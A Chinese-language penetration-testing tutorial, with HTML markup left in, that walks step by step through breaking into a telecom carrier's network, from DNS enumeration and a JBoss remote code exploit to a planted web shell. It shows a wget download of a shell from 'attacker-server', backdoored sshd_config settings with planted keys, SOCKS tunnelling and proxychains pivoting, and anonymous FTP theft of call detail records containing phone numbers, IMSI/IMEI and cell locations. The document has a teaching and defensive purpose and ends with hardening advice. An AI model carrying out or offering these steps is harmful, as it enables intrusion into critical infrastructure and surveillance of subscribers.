电信网络渗透测试实战教学：从RCE到SS7核心系统访问<\/h1>

1. 侦察阶段<\/h2>

1.1 DNS枚举<\/h3>
使用aiodnsbrute工具进行大规模DNS枚举：<\/p>
aiodnsbrute -v -t 7000<\/span> --no-verify -w dns-list.uniq.lst target.com | grep -v Timeout | grep -v Misformatted | grep -v exception
<\/span><\/span><\/code><\/pre>
使用277万条记录的字典<\/li>
重点关注非常规子域名，如e[REDACTED]-nms.[REDACTED].com<\/code><\/li>
<\/ul>
1.2 全端口扫描<\/h3>

不局限于80\/443端口<\/li>
发现关键端口14100运行JBoss服务<\/li>
<\/ul>
2. 初始入侵：JBoss漏洞利用<\/h2>
2.1 使用Jexboss工具<\/h3>
.\/jexboss.py -u http:\/\/target:14100\/
<\/span><\/span><\/code><\/pre>
利用JMXInvokerServlet方法获取RCE<\/li>
自动上传jexws4.jsp WAR shell<\/li>
<\/ul>
2.2 Shell稳定性问题<\/h3>

常规反向shell不稳定，几秒后断开<\/li>
尝试多种payload均失败：

不同反连端口<\/li>
UDP连接<\/li>
Meterpreter payload<\/li>
<\/ul>
<\/li>
<\/ul>
3. 隧道技术：建立稳定连接<\/h2>
3.1 ABPTTS隧道<\/h3>
使用ABPTTS创建HTTP上的TCP隧道：<\/p>
python abpttsfactory.py -o jexws4.jsp
<\/span><\/span><\/code><\/pre>
生成JSP shell替换原有jexws4.jsp<\/li>
上传到目标服务器：<\/li>
<\/ul>
wget http:\/\/attacker-server\/jexws4.jsp -O <目标路径>\/jexws4.jsp
<\/span><\/span><\/code><\/pre>3.2 端口转发配置<\/h3>
python abpttsclient.py -c config.txt -u http:\/\/target\/jexws4.jsp -f 127.0.0.1:2222\/127.0.0.1:22
<\/span><\/span><\/code><\/pre>
本地2222端口映射到目标22端口<\/li>
<\/ul>
3.3 隐蔽SSH配置<\/h3>

本地创建与目标相同的用户nms<\/code><\/li>
生成SSH密钥对<\/li>
修改目标sshd_config关键参数：

AllowTCPForwarding yes<\/code><\/li>
GatewayPorts yes<\/code><\/li>
PermitRootLogin yes<\/code><\/li>
StrictModes no<\/code><\/li>
<\/ul>
<\/li>
上传公钥到目标authorized_keys<\/code><\/li>
<\/ol>
3.4 动态SSH隧道(SOCKS)<\/h3>
ssh -NfCq -D 9090<\/span> -i private_key root@127.0.0.1 -p 2222<\/span>
<\/span><\/span><\/code><\/pre>
通过9090端口建立SOCKS代理<\/li>
所有流量通过加密隧道传输<\/li>
<\/ul>
4. 内网横向移动<\/h2>
4.1 代理配置<\/h3>
在Metasploit中设置全局代理：<\/p>
setg Proxies socks4:127.0.0.1:9090
<\/code><\/pre>
4.2 内网扫描<\/h3>
使用auxiliary\/scanner\/http\/http_version<\/code>模块扫描内网：<\/p>

发现内部JBoss实例(10.x.x.x:80)<\/li>
发现iRMC管理接口<\/li>
发现SAN交换机管理界面<\/li>
<\/ul>
4.3 二次渗透<\/h3>
通过代理链利用内部JBoss漏洞：<\/p>
proxychains .\/jexboss.py -u http:\/\/10.x.x.x\/ -P socks4:\/\/127.0.0.1:9090
<\/span><\/span><\/code><\/pre>5. 访问电信核心系统<\/h2>
5.1 发现SS7相关组件<\/h3>

\/home\/user\/ss7-cli.bat<\/code> - SS7命令行管理程序<\/li>
VLR(访问者位置寄存器)控制台客户端<\/li>
Mobicents VoIP平台<\/li>
<\/ul>
5.2 SS7协议简介<\/h3>

用于PSTN网络中的信令传输<\/li>
提供号码转换、短信服务等功能<\/li>
通过CDR(呼叫详细记录)进行计费<\/li>
<\/ul>
5.3 访问CDR数据库<\/h3>

从\/etc\/hosts<\/code>发现内部FTP服务器：

CDR-S服务器(存储S-Records)<\/li>
CDR-L服务器(存储L-Records)<\/li>
<\/ul>
<\/li>
匿名访问FTP获取CDR数据：

包含呼叫始发地(A Number)<\/li>
被叫号码(B Number)<\/li>
IMSI\/IMEI号码<\/li>
呼叫时间戳和持续时间<\/li>
基站ID和位置信息<\/li>
<\/ul>
<\/li>
<\/ol>
6. 关键防御建议<\/h2>
6.1 针对JBoss服务<\/h3>

及时更新JBoss版本<\/li>
禁用不必要的JMXInvokerServlet<\/li>
实施严格的访问控制<\/li>
<\/ul>
6.2 针对隧道攻击<\/h3>

监控异常SSH连接(特别是本地到本地)<\/li>
检查sshd_config文件的异常修改<\/li>
实施SSH证书认证而非密码认证<\/li>
<\/ul>
6.3 针对核心系统<\/h3>

核心系统(如SS7组件)应隔离部署<\/li>
CDR数据库访问需多重认证<\/li>
实施严格的网络分段策略<\/li>
<\/ul>
6.4 日志监控<\/h3>

集中收集和分析所有关键系统日志<\/li>
设置异常行为告警(如配置文件修改)<\/li>
定期审计特权账户活动<\/li>
<\/ul>
附录：工具列表<\/h2>


侦察工具<\/strong>:<\/p>

aiodnsbrute - 大规模DNS枚举<\/li>
nmap - 全端口扫描<\/li>
<\/ul>
<\/li>

漏洞利用工具<\/strong>:<\/p>

Jexboss - JBoss漏洞利用框架<\/li>
Metasploit - 多用途渗透测试框架<\/li>
<\/ul>
<\/li>

隧道工具<\/strong>:<\/p>

ABPTTS - HTTP上的TCP隧道<\/li>
SSH - 加密隧道和端口转发<\/li>
<\/ul>
<\/li>

代理工具<\/strong>:<\/p>

proxychains - 多级代理工具<\/li>
SOCKS代理 - 动态端口转发<\/li>
<\/ul>
<\/li>

后渗透工具<\/strong>:<\/p>

标准Linux工具(w, find等) - 信息收集<\/li>
FTP客户端 - 数据传输<\/li>
<\/ul>
<\/li>
<\/ol>